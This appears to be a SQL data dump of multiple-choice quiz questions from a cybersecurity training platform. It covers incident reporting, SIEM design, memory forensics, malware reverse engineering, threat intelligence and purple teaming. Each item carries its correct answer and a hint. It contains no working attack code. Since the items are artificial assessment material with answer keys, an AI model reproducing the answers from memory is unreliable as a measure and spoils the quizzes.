(6161, 336, 'For malware alerts, a common automated action is:', 5, 'Isolate the host', 0, 'Contain', '2025-12-26 23:11:57', '[\"Delete files\", \"Isolate the host\", \"Reboot\", \"Ignore\"]'),
(6162, 336, 'TheHive is an example of:', 6, 'Open-source SOAR', 0, 'Free', '2025-12-26 23:11:57', '[\"Commercial SIEM\", \"Open-source SOAR\", \"Antivirus\", \"Firewall\"]'),
(6163, 341, 'Why is real-time documentation important?', 1, 'You will forget details later', 0, 'Accurate', '2025-12-26 23:13:12', '[\"It is not\", \"You will forget details later\", \"It is slower\", \"For fun\"]'),
(6164, 341, 'Documentation is required for:', 2, 'Legal evidence and audits', 0, 'Compliance', '2025-12-26 23:13:12', '[\"Fun\", \"Legal evidence and audits\", \"Nothing\", \"Vacation\"]'),
(6165, 341, 'What should you avoid in documentation?', 3, 'Vague language like \"some malware\"', 0, 'Be specific', '2025-12-26 23:13:12', '[\"Details\", \"Vague language like \\\"some malware\\\"\", \"Timestamps\", \"Evidence\"]'),
(6166, 342, 'What timezone should timelines use?', 1, 'UTC', 0, 'Standard', '2025-12-26 23:13:12', '[\"Local\", \"UTC\", \"EST\", \"Random\"]'),
(6167, 342, 'What should every timeline entry include?', 2, 'Timestamp, Source, Event, Actor', 0, 'Complete', '2025-12-26 23:13:12', '[\"Just time\", \"Timestamp, Source, Event, Actor\", \"Just event\", \"Nothing\"]'),
(6168, 342, 'Why link to evidence in the timeline?', 3, 'To support claims with proof', 0, 'Verification', '2025-12-26 23:13:12', '[\"Decoration\", \"To support claims with proof\", \"Fun\", \"Color\"]'),
(6169, 343, 'What comes first in an incident report?', 1, 'Executive Summary', 0, 'Top', '2025-12-26 23:13:12', '[\"Appendix\", \"Executive Summary\", \"Technical Findings\", \"Timeline\"]'),
(6170, 343, 'Who is the Executive Summary written for?', 2, 'Leadership (non-technical)', 0, 'C-Suite', '2025-12-26 23:13:12', '[\"Hackers\", \"Leadership (non-technical)\", \"Developers\", \"Interns\"]'),
(6171, 343, 'What should you include in an Appendix?', 3, 'Raw logs, hashes, supporting evidence', 0, 'Details', '2025-12-26 23:13:12', '[\"Summary\", \"Raw logs, hashes, supporting evidence\", \"Executive summary\", \"Nothing\"]'),
(6172, 344, 'What should an Executive Summary avoid?', 1, 'Technical jargon', 0, 'Simple', '2025-12-26 23:13:12', '[\"Details\", \"Technical jargon\", \"Impact\", \"Recommendations\"]'),
(6173, 344, 'How should impact be described?', 2, 'In business terms (money, data, reputation)', 0, 'Quantify', '2025-12-26 23:13:12', '[\"Technically\", \"In business terms (money, data, reputation)\", \"Vaguely\", \"Not at all\"]'),
(6174, 344, 'What question should the summary answer?', 3, 'What happened and are we safe?', 0, 'Status', '2025-12-26 23:13:12', '[\"Who is to blame?\", \"What happened and are we safe?\", \"What is for lunch?\", \"Nothing\"]'),
(6175, 345, 'What does MTTD stand for?', 1, 'Mean Time to Detect', 0, 'Detection', '2025-12-26 23:13:12', '[\"Mean Time to Delete\", \"Mean Time to Detect\", \"Maximum Threat Time\", \"None\"]'),
(6176, 345, 'A high False Positive rate indicates:', 2, 'Poor detection rules', 0, 'Bad rules', '2025-12-26 23:13:12', '[\"Good security\", \"Poor detection rules\", \"Fast response\", \"Nothing\"]'),
(6177, 345, 'Why track metrics over time?', 3, 'To identify trends and improvements', 0, 'Progress', '2025-12-26 23:13:12', '[\"For fun\", \"To identify trends and improvements\", \"To delete data\", \"No reason\"]'),
(6178, 346, 'What timezone should incident timelines use?', 1, 'UTC', 0, 'Standard', '2025-12-26 23:13:12', '[\"Local\", \"UTC\", \"EST\", \"Random\"]'),
(6179, 346, 'Who is the Executive Summary written for?', 2, 'Leadership', 0, 'Audience', '2025-12-26 23:13:12', '[\"Hackers\", \"Leadership\", \"Developers\", \"Public\"]'),
(6180, 346, 'What does MTTR stand for?', 3, 'Mean Time to Respond', 0, 'Response', '2025-12-26 23:13:12', '[\"Mean Time to Read\", \"Mean Time to Respond\", \"Max Threat Time\", \"None\"]'),
(6181, 346, 'What should documentation avoid?', 4, 'Vague language', 0, 'Specific', '2025-12-26 23:13:12', '[\"Details\", \"Vague language\", \"Timestamps\", \"Evidence\"]'),
(6182, 346, 'What makes metrics valuable?', 5, 'Tracking trends over time', 0, 'Progress', '2025-12-26 23:13:12', '[\"One-time snapshots\", \"Tracking trends over time\", \"Colors\", \"Nothing\"]'),
(6183, 346, 'An Appendix should contain:', 6, 'Raw evidence and supporting data', 0, 'Details', '2025-12-26 23:13:12', '[\"Summary\", \"Raw evidence and supporting data\", \"Executive summary\", \"Nothing\"]'),
(6184, 361, 'What is the purpose of a message queue (Kafka) in SIEM?', 1, 'Buffer ingestion spikes and decouple collection from indexing', 0, 'Buffer', '2025-12-27 02:16:31', '[\"Speed up queries\", \"Buffer ingestion spikes and decouple collection from indexing\", \"Store logs long-term\", \"Replace the SIEM\"]'),
(6185, 361, 'In tiered storage, where should the last 7 days of logs reside?', 2, 'Hot tier (SSD)', 0, 'Fast', '2025-12-27 02:16:31', '[\"Cold archive\", \"Hot tier (SSD)\", \"Data lake\", \"Backup tapes\"]'),
(6186, 361, 'What does Search Head Cluster provide in Splunk?', 3, 'High availability and load balancing for searches', 0, 'HA', '2025-12-27 02:16:31', '[\"Faster indexing\", \"High availability and load balancing for searches\", \"Better parsing\", \"Cheaper storage\"]'),
(6187, 362, 'What does ECS stand for?', 1, 'Elastic Common Schema', 0, 'Schema', '2025-12-27 02:16:31', '[\"Event Collection System\", \"Elastic Common Schema\", \"Enterprise Control System\", \"Endpoint Correlation Service\"]'),
(6188, 362, 'Why normalize logs to a common schema?', 2, 'Enable consistent queries across different log sources', 0, 'Consistency', '2025-12-27 02:16:31', '[\"Make logs smaller\", \"Enable consistent queries across different log sources\", \"Hide sensitive data\", \"Comply with regulations\"]'),
(6189, 362, 'What enrichment might you add during parsing?', 3, 'GeoIP, asset info, threat intelligence', 0, 'Context', '2025-12-27 02:16:31', '[\"Compression\", \"GeoIP, asset info, threat intelligence\", \"Encryption\", \"Deletion markers\"]'),
(6190, 363, 'What is \"Multi-Stage Correlation\"?', 1, 'Detecting attack chains across multiple events/logs', 0, 'Chain', '2025-12-27 02:16:31', '[\"Faster queries\", \"Detecting attack chains across multiple events/logs\", \"Storing more data\", \"Compressing logs\"]'),
(6191, 363, 'Why add whitelists to correlation rules?', 2, 'Reduce false positives from known-good sources', 0, 'Tune', '2025-12-27 02:16:31', '[\"Make rules slower\", \"Reduce false positives from known-good sources\", \"Delete logs\", \"Add encryption\"]'),
(6192, 363, 'What is \"Absence Detection\"?', 3, 'Alerting when an expected event does NOT occur', 0, 'Missing', '2025-12-27 02:16:31', '[\"Detecting attackers\", \"Alerting when an expected event does NOT occur\", \"Finding duplicates\", \"Searching faster\"]'),
(6193, 364, 'Why filter early in a query?', 1, 'Reduce data volume before expensive operations', 0, 'Performance', '2025-12-27 02:16:31', '[\"Make results pretty\", \"Reduce data volume before expensive operations\", \"Add more logs\", \"Comply with laws\"]'),
(6194, 364, 'Which wildcard placement is more efficient?', 2, 'Suffix: admin* (not *admin)', 0, 'Suffix', '2025-12-27 02:16:31', '[\"Both equal\", \"Suffix: admin* (not *admin)\", \"Prefix: *admin\", \"Neither\"]'),
(6195, 364, 'What does \"indexed field\" mean?', 3, 'A field the SIEM can search quickly without scanning all data', 0, 'Fast lookup', '2025-12-27 02:16:31', '[\"A calculated field\", \"A field the SIEM can search quickly without scanning all data\", \"A deleted field\", \"A hidden field\"]'),
(6196, 365, 'What is Sigma?', 1, 'Vendor-agnostic detection rule format', 0, 'Universal', '2025-12-27 02:16:31', '[\"A SIEM product\", \"Vendor-agnostic detection rule format\", \"A programming language\", \"A log format\"]'),
(6197, 365, 'Why use version control for detections?', 2, 'Track changes and enable rollback', 0, 'Git', '2025-12-27 02:16:31', '[\"Make detections slower\", \"Track changes and enable rollback\", \"Hide detections\", \"Compress rules\"]'),
(6198, 365, 'What tool executes real attack techniques for testing?', 3, 'Atomic Red Team', 0, 'Test', '2025-12-27 02:16:31', '[\"Sigma\", \"Atomic Red Team\", \"Splunk\", \"Wireshark\"]'),
(6199, 366, 'In a tiered storage model, where are recent logs stored?', 1, 'Hot tier (SSD)', 0, 'Tier', '2025-12-27 02:16:31', '[\"Cold archive\", \"Hot tier (SSD)\", \"Tape\", \"Cloud only\"]'),
(6200, 366, 'What does OCSF stand for?', 2, 'Open Cybersecurity Schema Framework', 0, 'Schema', '2025-12-27 02:16:31', '[\"Open Cyber Security Framework\", \"Open Cybersecurity Schema Framework\", \"Online Cloud Security Format\", \"None\"]'),
(6201, 366, 'Multi-Stage Correlation detects:', 3, 'Attack chains across multiple events', 0, 'Chain', '2025-12-27 02:16:31', '[\"Single events\", \"Attack chains across multiple events\", \"Faster searches\", \"Log compression\"]'),
(6202, 366, 'What is the benefit of filtering early in queries?', 4, 'Reduce data volume for faster execution', 0, 'Speed', '2025-12-27 02:16:31', '[\"More results\", \"Reduce data volume for faster execution\", \"Better colors\", \"More logs\"]'),
(6203, 366, 'Sigma rules compile to:', 5, 'SIEM-specific queries (SPL, KQL, etc.)', 0, 'Output', '2025-12-27 02:16:31', '[\"PDFs\", \"SIEM-specific queries (SPL, KQL, etc.)\", \"Executables\", \"Emails\"]'),
(6204, 366, 'Detection-as-Code enables:', 6, 'Version control and CI/CD for detections', 0, 'DevOps', '2025-12-27 02:16:31', '[\"Faster attacks\", \"Version control and CI/CD for detections\", \"More alerts\", \"Less security\"]'),
(6205, 371, 'Why is memory forensics critical for fileless malware?', 1, 'Fileless malware never touches disk; only exists in RAM', 0, 'Volatile', '2025-12-27 02:18:03', '[\"It is faster\", \"Fileless malware never touches disk; only exists in RAM\", \"Disk is encrypted\", \"Memory is smaller\"]'),
(6206, 371, 'When should you capture memory during an incident?', 2, 'Before shutdown or containment actions', 0, 'Early', '2025-12-27 02:18:03', '[\"After formatting\", \"Before shutdown or containment actions\", \"Next week\", \"Never\"]'),
(6207, 371, 'What happens to RAM when power is removed?', 3, 'Data is lost (volatile memory)', 0, 'Gone', '2025-12-27 02:18:03', '[\"Data is saved\", \"Data is lost (volatile memory)\", \"Data is compressed\", \"Data is encrypted\"]'),
(6208, 372, 'Which tool captures Linux memory?', 1, 'LiME (Linux Memory Extractor)', 0, 'Linux', '2025-12-27 02:18:03', '[\"WinPMEM\", \"LiME (Linux Memory Extractor)\", \"DumpIt\", \"FTK Imager\"]'),
(6209, 372, 'What is hiberfil.sys?', 2, 'Windows hibernation file containing RAM contents', 0, 'Sleep', '2025-12-27 02:18:03', '[\"A log file\", \"Windows hibernation file containing RAM contents\", \"A virus\", \"A backup file\"]'),
(6210, 372, 'Why run acquisition tool from external USB?', 3, 'Avoid writing to evidence disk and altering it', 0, 'Integrity', '2025-12-27 02:18:03', '[\"Faster speed\", \"Avoid writing to evidence disk and altering it\", \"USB is encrypted\", \"No reason\"]'),
(6211, 373, 'Which plugin finds hidden/unlinked processes?', 1, 'psscan', 0, 'Hidden', '2025-12-27 02:18:03', '[\"pslist\", \"psscan\", \"cmdline\", \"dlllist\"]'),
(6212, 373, 'What does malfind detect?', 2, 'Injected code in process memory', 0, 'Injection', '2025-12-27 02:18:03', '[\"Network connections\", \"Injected code in process memory\", \"File hashes\", \"Passwords\"]'),
(6213, 373, 'What is the difference between pslist and psscan?', 3, 'pslist walks linked list; psscan scans all memory for process structs', 0, 'Scan vs Walk', '2025-12-27 02:18:03', '[\"No difference\", \"pslist walks linked list; psscan scans all memory for process structs\", \"psscan is faster\", \"pslist finds hidden processes\"]'),
(6214, 374, 'What is Process Hollowing?', 1, 'Starting a process suspended and replacing its code', 0, 'Replace', '2025-12-27 02:18:03', '[\"Loading a DLL\", \"Starting a process suspended and replacing its code\", \"Killing a process\", \"Debugging\"]'),
(6215, 374, 'What memory protection is suspicious when combined with code?', 2, 'PAGE_EXECUTE_READWRITE', 0, 'RWX', '2025-12-27 02:18:03', '[\"PAGE_READONLY\", \"PAGE_EXECUTE_READWRITE\", \"PAGE_NOACCESS\", \"PAGE_WRITECOPY\"]'),
(6216, 374, 'How do you detect unlinked/hidden processes?', 3, 'Compare pslist (linked) vs psscan (scanned)', 0, 'Compare', '2025-12-27 02:18:03', '[\"Run antivirus\", \"Compare pslist (linked) vs psscan (scanned)\", \"Reboot\", \"Check Task Manager\"]'),
(6217, 375, 'What does DKOM stand for?', 1, 'Direct Kernel Object Manipulation', 0, 'Kernel', '2025-12-27 02:18:03', '[\"Dynamic Kernel Object Mode\", \"Direct Kernel Object Manipulation\", \"Driver Kernel Object Manager\", \"None\"]'),
(6218, 375, 'How does a rootkit hide a process using DKOM?', 2, 'Unlinks the process from the EPROCESS linked list', 0, 'Unlink', '2025-12-27 02:18:03', '[\"Deletes the executable\", \"Unlinks the process from the EPROCESS linked list\", \"Renames the process\", \"Encrypts the process\"]');
INSERT INTO `lesson_questions` (`id`, `task_id`, `question_text`, `question_order`, `correct_answer`, `case_sensitive`, `hint`, `created_at`, `options`) VALUES
(6219, 375, 'Which Volatility plugin detects SSDT hooks?', 3, 'ssdt', 0, 'Hooks', '2025-12-27 02:18:03', '[\"pslist\", \"netscan\", \"ssdt\", \"malfind\"]'),
(6220, 376, 'What type of malware only exists in RAM?', 1, 'Fileless malware', 0, 'Memory-only', '2025-12-27 02:18:03', '[\"Ransomware\", \"Fileless malware\", \"Worm\", \"Trojan\"]'),
(6221, 376, 'Which tool is used for Linux memory acquisition?', 2, 'LiME', 0, 'Linux', '2025-12-27 02:18:03', '[\"WinPMEM\", \"DumpIt\", \"LiME\", \"FTK Imager\"]'),
(6222, 376, 'What does malfind detect?', 3, 'Injected code in process memory', 0, 'Injection', '2025-12-27 02:18:03', '[\"Files\", \"Injected code in process memory\", \"Passwords\", \"Network\"]'),
(6223, 376, 'What is DKOM?', 4, 'Direct Kernel Object Manipulation', 0, 'Rootkit', '2025-12-27 02:18:03', '[\"Dynamic Kernel Mode\", \"Direct Kernel Object Manipulation\", \"Driver Object Manager\", \"None\"]'),
(6224, 376, 'pslist walks the linked list; psscan...', 5, 'Scans all memory for process structures', 0, 'Scan', '2025-12-27 02:18:03', '[\"Is the same\", \"Scans all memory for process structures\", \"Is faster\", \"Only works on Linux\"]'),
(6225, 376, 'What memory protection suggests injected code?', 6, 'PAGE_EXECUTE_READWRITE', 0, 'RWX', '2025-12-27 02:18:03', '[\"PAGE_READONLY\", \"PAGE_EXECUTE_READWRITE\", \"PAGE_GUARD\", \"PAGE_NOACCESS\"]'),
(6226, 381, 'What tool did the NSA release for free?', 1, 'Ghidra', 0, 'Free', '2025-12-27 02:19:34', '[\"IDA Pro\", \"Ghidra\", \"x64dbg\", \"OllyDbg\"]'),
(6227, 381, 'Why extract IOCs from malware?', 2, 'Create signatures and blocklists', 0, 'Detection', '2025-12-27 02:19:34', '[\"For fun\", \"Create signatures and blocklists\", \"Delete the malware\", \"Sell them\"]'),
(6228, 381, 'What is the purpose of a disassembler?', 3, 'Convert machine code to assembly', 0, 'Translate', '2025-12-27 02:19:34', '[\"Run malware\", \"Convert machine code to assembly\", \"Compile code\", \"Debug\"]'),
(6229, 382, 'Which register typically holds return values in x86?', 1, 'EAX', 0, 'Return', '2025-12-27 02:19:34', '[\"EBX\", \"EAX\", \"ECX\", \"ESP\"]'),
(6230, 382, 'What does the CALL instruction do?', 2, 'Calls a function (pushes return address, jumps)', 0, 'Function', '2025-12-27 02:19:34', '[\"Returns\", \"Calls a function (pushes return address, jumps)\", \"Compares\", \"Loops\"]'),
(6231, 382, 'In x64 calling convention, where are the first 4 arguments?', 3, 'Registers (RCX, RDX, R8, R9)', 0, 'Registers', '2025-12-27 02:19:34', '[\"Stack only\", \"Registers (RCX, RDX, R8, R9)\", \"Memory\", \"Nowhere\"]'),
(6232, 383, 'What does \"Xrefs\" show in IDA?', 1, 'Where a function or variable is referenced', 0, 'Cross-reference', '2025-12-27 02:19:34', '[\"Errors\", \"Where a function or variable is referenced\", \"Registry keys\", \"Network calls\"]'),
(6233, 383, 'What does Ghidra\'s decompiler produce?', 2, 'Pseudo-C code from assembly', 0, 'Readable', '2025-12-27 02:19:34', '[\"Executable\", \"Pseudo-C code from assembly\", \"Encrypted code\", \"Packed code\"]'),
(6234, 383, 'Which API is commonly used to inject code into another process?', 3, 'WriteProcessMemory + CreateRemoteThread', 0, 'Injection', '2025-12-27 02:19:34', '[\"CreateFile\", \"WriteProcessMemory + CreateRemoteThread\", \"RegSetValueEx\", \"CryptEncrypt\"]'),
(6235, 384, 'What does F7 do in x64dbg?', 1, 'Step Into (enter function calls)', 0, 'Step', '2025-12-27 02:19:34', '[\"Run\", \"Step Into (enter function calls)\", \"Exit\", \"Breakpoint\"]'),
(6236, 384, 'Why set a breakpoint on VirtualAlloc?', 2, 'Catch memory allocation (often for unpacking)', 0, 'Unpack', '2025-12-27 02:19:34', '[\"It is random\", \"Catch memory allocation (often for unpacking)\", \"Speed up\", \"Delete files\"]'),
(6237, 384, 'What is a common anti-debug API to bypass?', 3, 'IsDebuggerPresent', 0, 'Anti-debug', '2025-12-27 02:19:34', '[\"CreateFile\", \"IsDebuggerPresent\", \"InternetOpen\", \"RegSetValue\"]'),
(6238, 385, 'What is the purpose of a packer?', 1, 'Compress/obfuscate code to evade detection', 0, 'Hide', '2025-12-27 02:19:34', '[\"Speed up malware\", \"Compress/obfuscate code to evade detection\", \"Add features\", \"Make it smaller for email\"]'),
(6239, 385, 'What does API Hashing hide?', 2, 'The names of Windows APIs being called', 0, 'Names', '2025-12-27 02:19:34', '[\"Return values\", \"The names of Windows APIs being called\", \"File paths\", \"Network traffic\"]'),
(6240, 385, 'How do you find the Original Entry Point (OEP)?', 3, 'Set breakpoints on VirtualAlloc, step until unpacked code runs', 0, 'Breakpoint', '2025-12-27 02:19:34', '[\"Run strings\", \"Set breakpoints on VirtualAlloc, step until unpacked code runs\", \"Read documentation\", \"Ask the malware\"]'),
(6241, 386, 'Which tool is NSA\'s free disassembler?', 1, 'Ghidra', 0, 'Free', '2025-12-27 02:19:34', '[\"IDA Pro\", \"Ghidra\", \"x64dbg\", \"OllyDbg\"]'),
(6242, 386, 'Which register holds the return value in x86?', 2, 'EAX', 0, 'Return', '2025-12-27 02:19:34', '[\"EBX\", \"EAX\", \"ECX\", \"EDX\"]'),
(6243, 386, 'What does F7 do in x64dbg?', 3, 'Step Into', 0, 'Debug', '2025-12-27 02:19:34', '[\"Run\", \"Step Into\", \"Step Over\", \"Exit\"]'),
(6244, 386, 'What is the purpose of a packer?', 4, 'Obfuscate and evade detection', 0, 'Hide', '2025-12-27 02:19:34', '[\"Speed up\", \"Obfuscate and evade detection\", \"Add features\", \"Compress for email\"]'),
(6245, 386, 'Which API is used for code injection?', 5, 'WriteProcessMemory', 0, 'Inject', '2025-12-27 02:19:34', '[\"CreateFile\", \"WriteProcessMemory\", \"RegSetValue\", \"CryptEncrypt\"]'),
(6246, 386, 'What does IsDebuggerPresent detect?', 6, 'If the process is being debugged', 0, 'Anti-debug', '2025-12-27 02:19:34', '[\"Malware\", \"If the process is being debugged\", \"Network\", \"Files\"]'),
(6247, 391, 'Who consumes Strategic threat intel?', 1, 'Executives (high-level trends, risk)', 0, 'Leadership', '2025-12-27 02:21:01', '[\"SOC Analysts\", \"Executives (high-level trends, risk)\", \"Developers\", \"Interns\"]'),
(6248, 391, 'What does \"Actionability\" mean for intel?', 2, 'Can we do something with this information?', 0, 'Useful', '2025-12-27 02:21:01', '[\"Is it expensive\", \"Can we do something with this information?\", \"Is it pretty\", \"Is it long\"]'),
(6249, 391, 'Technical intel contains:', 3, 'Hashes, IPs, domains, YARA rules', 0, 'IOCs', '2025-12-27 02:21:01', '[\"Strategy documents\", \"Hashes, IPs, domains, YARA rules\", \"Financial reports\", \"HR data\"]'),
(6250, 392, 'What is MISP?', 1, 'Open-source threat intel sharing platform', 0, 'Platform', '2025-12-27 02:21:01', '[\"A SIEM\", \"Open-source threat intel sharing platform\", \"A firewall\", \"A sandbox\"]'),
(6251, 392, 'What does GreyNoise help distinguish?', 2, 'Background internet noise vs targeted attacks', 0, 'Filter', '2025-12-27 02:21:01', '[\"Good vs bad files\", \"Background internet noise vs targeted attacks\", \"Encrypted vs clear\", \"Fast vs slow\"]'),
(6252, 392, 'What is \"Pivoting\" in threat intel?', 3, 'Using one IOC to discover related infrastructure', 0, 'Connect', '2025-12-27 02:21:01', '[\"Turning around\", \"Using one IOC to discover related infrastructure\", \"Deleting IOCs\", \"Renaming IOCs\"]'),
(6253, 393, 'What is the Diamond Model used for?', 1, 'Relating Adversary, Infrastructure, Capability, and Victim', 0, 'Framework', '2025-12-27 02:21:01', '[\"File analysis\", \"Relating Adversary, Infrastructure, Capability, and Victim\", \"Network monitoring\", \"Encryption\"]'),
(6254, 393, 'Why is attribution difficult?', 2, 'False flags, shared tools, proxy infrastructure', 0, 'Challenges', '2025-12-27 02:21:01', '[\"It is easy\", \"False flags, shared tools, proxy infrastructure\", \"Everyone signs their work\", \"Logs are perfect\"]'),
(6255, 393, 'What does \"High Confidence\" attribution mean?', 3, 'Multiple corroborating sources support it', 0, 'Verified', '2025-12-27 02:21:01', '[\"Guessing\", \"Multiple corroborating sources support it\", \"One source\", \"No evidence\"]'),
(6256, 394, 'What is STIX?', 1, 'JSON format for describing threat intelligence', 0, 'Format', '2025-12-27 02:21:01', '[\"A transport protocol\", \"JSON format for describing threat intelligence\", \"A firewall\", \"A SIEM\"]'),
(6257, 394, 'What does TAXII do?', 2, 'Transport STIX-formatted threat intel', 0, 'Transport', '2025-12-27 02:21:01', '[\"Store files\", \"Transport STIX-formatted threat intel\", \"Encrypt data\", \"Delete IOCs\"]'),
(6258, 394, 'What does TLP:RED mean?', 3, 'Not for disclosure outside the recipient', 0, 'Restricted', '2025-12-27 02:21:01', '[\"Public\", \"Not for disclosure outside the recipient\", \"Community share\", \"Partner share\"]'),
(6259, 395, 'Where can you push IOCs for blocking?', 1, 'Firewall, Proxy, EDR, Email Gateway', 0, 'Enforcement', '2025-12-27 02:21:01', '[\"Nowhere\", \"Firewall, Proxy, EDR, Email Gateway\", \"Only SIEM\", \"Only Email\"]'),
(6260, 395, 'What is a TIP?', 2, 'Threat Intelligence Platform', 0, 'Platform', '2025-12-27 02:21:01', '[\"Threat Inspection Protocol\", \"Threat Intelligence Platform\", \"Technical Investigation Process\", \"None\"]'),
(6261, 395, 'Why is a feedback loop important?', 3, 'Intel team learns if IOCs were useful or false positives', 0, 'Improve', '2025-12-27 02:21:01', '[\"It is not\", \"Intel team learns if IOCs were useful or false positives\", \"To delete intel\", \"To create more alerts\"]'),
(6262, 396, 'Who consumes Strategic intel?', 1, 'Executives', 0, 'Leadership', '2025-12-27 02:21:01', '[\"SOC Analysts\", \"Executives\", \"Developers\", \"All\"]'),
(6263, 396, 'What is MISP?', 2, 'Open-source threat intel platform', 0, 'Platform', '2025-12-27 02:21:01', '[\"SIEM\", \"Open-source threat intel platform\", \"Firewall\", \"EDR\"]'),
(6264, 396, 'STIX is a:', 3, 'JSON format for threat intel', 0, 'Format', '2025-12-27 02:21:01', '[\"Transport protocol\", \"JSON format for threat intel\", \"Firewall rule\", \"Log format\"]'),
(6265, 396, 'TAXII is a:', 4, 'Transport protocol for STIX', 0, 'Transport', '2025-12-27 02:21:01', '[\"Data format\", \"Transport protocol for STIX\", \"SIEM\", \"EDR\"]'),
(6266, 396, 'What does TLP:RED mean?', 5, 'Not for disclosure outside recipient', 0, 'Restricted', '2025-12-27 02:21:01', '[\"Public\", \"Not for disclosure outside recipient\", \"Share widely\", \"Community only\"]'),
(6267, 396, 'Where do you push IOCs for enforcement?', 6, 'Firewall, Proxy, EDR', 0, 'Block', '2025-12-27 02:21:01', '[\"Only SIEM\", \"Firewall, Proxy, EDR\", \"Nowhere\", \"Email only\"]'),
(6268, 401, 'What is the Red Team\'s primary role?', 1, 'Offensive - simulate attacks to test defenses', 0, 'Offense', '2025-12-27 02:22:24', '[\"Defensive\", \"Offensive - simulate attacks to test defenses\", \"Compliance\", \"Training\"]'),
(6269, 401, 'What is Purple Teaming?', 2, 'Collaboration between Red and Blue teams', 0, 'Collab', '2025-12-27 02:22:24', '[\"Only offense\", \"Collaboration between Red and Blue teams\", \"Only defense\", \"Management\"]'),
(6270, 401, 'Why does Purple Teaming improve security?', 3, 'Red shares attack methods, Blue improves detection', 0, 'Learn together', '2025-12-27 02:22:24', '[\"It is cheaper\", \"Red shares attack methods, Blue improves detection\", \"More alerts\", \"Less work\"]'),
(6271, 402, 'What is an ROE in Red Team context?', 1, 'Rules of Engagement - defines scope and limits', 0, 'Rules', '2025-12-27 02:22:24', '[\"A tool\", \"Rules of Engagement - defines scope and limits\", \"A C2 framework\", \"A report\"]'),
(6272, 402, 'Which tool is used for AD attack path mapping?', 2, 'BloodHound', 0, 'Graph', '2025-12-27 02:22:24', '[\"Metasploit\", \"BloodHound\", \"Cobalt Strike\", \"Nmap\"]'),
(6273, 402, 'What is post-exploitation?', 3, 'Actions after initial access (persistence, lateral movement)', 0, 'After', '2025-12-27 02:22:24', '[\"Before hacking\", \"Actions after initial access (persistence, lateral movement)\", \"Cleanup\", \"Reporting\"]'),
(6274, 403, 'What does NDR focus on?', 1, 'Network Detection and Response', 0, 'Network', '2025-12-27 02:22:24', '[\"Endpoints\", \"Network Detection and Response\", \"Email\", \"Cloud\"]'),
(6275, 403, 'What is a honeytoken?', 2, 'Fake credential or data designed to alert on access', 0, 'Trap', '2025-12-27 02:22:24', '[\"Real password\", \"Fake credential or data designed to alert on access\", \"A log file\", \"A backup\"]'),
(6276, 403, 'How does Blue Team use MITRE ATT&CK?', 3, 'Map detection coverage and identify gaps', 0, 'Coverage', '2025-12-27 02:22:24', '[\"Attack systems\", \"Map detection coverage and identify gaps\", \"Delete logs\", \"Train users\"]'),
(6277, 404, 'What is an Atomic Test?', 1, 'Single technique execution with immediate validation', 0, 'Small test', '2025-12-27 02:22:24', '[\"Full attack simulation\", \"Single technique execution with immediate validation\", \"Discussion only\", \"Report writing\"]'),
(6278, 404, 'During Purple Team, what happens if Blue fails to detect?', 2, 'Create new detection rule or tune existing', 0, 'Improve', '2025-12-27 02:22:24', '[\"Blame Red\", \"Create new detection rule or tune existing\", \"Ignore it\", \"Delete logs\"]'),
(6279, 404, 'Why is real-time communication important in Purple Team?', 3, 'Blue can correlate activity in real-time', 0, 'Immediate', '2025-12-27 02:22:24', '[\"It is not\", \"Blue can correlate activity in real-time\", \"For fun\", \"To delay\"]'),
(6280, 405, 'What is the difference between pen testing and adversary emulation?', 1, 'Adversary emulation replicates specific threat actor TTPs', 0, 'Realistic', '2025-12-27 02:22:24', '[\"No difference\", \"Adversary emulation replicates specific threat actor TTPs\", \"Pen testing is better\", \"Emulation is cheaper\"]'),
(6281, 405, 'Which framework automates adversary emulation?', 2, 'MITRE Caldera', 0, 'Automated', '2025-12-27 02:22:24', '[\"Metasploit\", \"MITRE Caldera\", \"Wireshark\", \"Splunk\"]'),
(6282, 405, 'Why emulate a specific APT group?', 3, 'Test defenses against adversaries likely to target you', 0, 'Relevance', '2025-12-27 02:22:24', '[\"For fun\", \"Test defenses against adversaries likely to target you\", \"It is required\", \"To impress management\"]'),
(6283, 406, 'What is the Red Team\'s goal?', 1, 'Test defenses by simulating attacks', 0, 'Offense', '2025-12-27 02:22:24', '[\"Build tools\", \"Test defenses by simulating attacks\", \"Write reports\", \"Train users\"]'),
(6284, 406, 'What is Purple Teaming?', 2, 'Collaboration between Red and Blue', 0, 'Together', '2025-12-27 02:22:24', '[\"Only offense\", \"Collaboration between Red and Blue\", \"Only defense\", \"Compliance\"]'),
(6285, 406, 'Which tool extracts Windows credentials?', 3, 'Mimikatz', 0, 'Creds', '2025-12-27 02:22:24', '[\"BloodHound\", \"Mimikatz\", \"Cobalt Strike\", \"Nmap\"]'),
(6286, 406, 'What is a honeytoken?', 4, 'Fake data that alerts when accessed', 0, 'Trap', '2025-12-27 02:22:24', '[\"Password\", \"Fake data that alerts when accessed\", \"Log file\", \"Backup\"]'),
(6287, 406, 'What framework automates adversary emulation?', 5, 'MITRE Caldera', 0, 'Automation', '2025-12-27 02:22:24', '[\"Metasploit\", \"MITRE Caldera\", \"Wireshark\", \"Burp\"]'),
(6288, 406, 'What happens after Blue fails to detect in Purple Team?', 6, 'Create or improve detection rules', 0, 'Improve', '2025-12-27 02:22:24', '[\"Blame Red\", \"Create or improve detection rules\", \"Ignore it\", \"Fire someone\"]'),
(6289, 411, 'Why establish a baseline before exercises?', 1, 'To distinguish attack activity from normal behavior', 0, 'Compare', '2025-12-27 02:26:00', '[\"It is required by law\", \"To distinguish attack activity from normal behavior\", \"To slow things down\", \"No reason\"]'),
(6290, 411, 'What should be documented for each exercise?', 2, 'Technique, execution steps, expected detection, results', 0, 'Everything', '2025-12-27 02:26:00', '[\"Nothing\", \"Technique, execution steps, expected detection, results\", \"Only failures\", \"Only successes\"]'),
(6291, 411, 'Which tool provides a library of technique tests?', 3, 'Atomic Red Team', 0, 'Library', '2025-12-27 02:26:00', '[\"Splunk\", \"Atomic Red Team\", \"Wireshark\", \"Nmap\"]'),
(6292, 412, 'Which Sysmon Event ID indicates process access to LSASS?', 1, 'Event ID 10', 0, 'Access', '2025-12-27 02:26:00', '[\"Event ID 1\", \"Event ID 10\", \"Event ID 11\", \"Event ID 22\"]'),
(6293, 412, 'What is DCSync?', 2, 'Replicating AD credentials by impersonating a domain controller', 0, 'Replication', '2025-12-27 02:26:00', '[\"Syncing files\", \"Replicating AD credentials by impersonating a domain controller\", \"Backing up\", \"Logging\"]'),
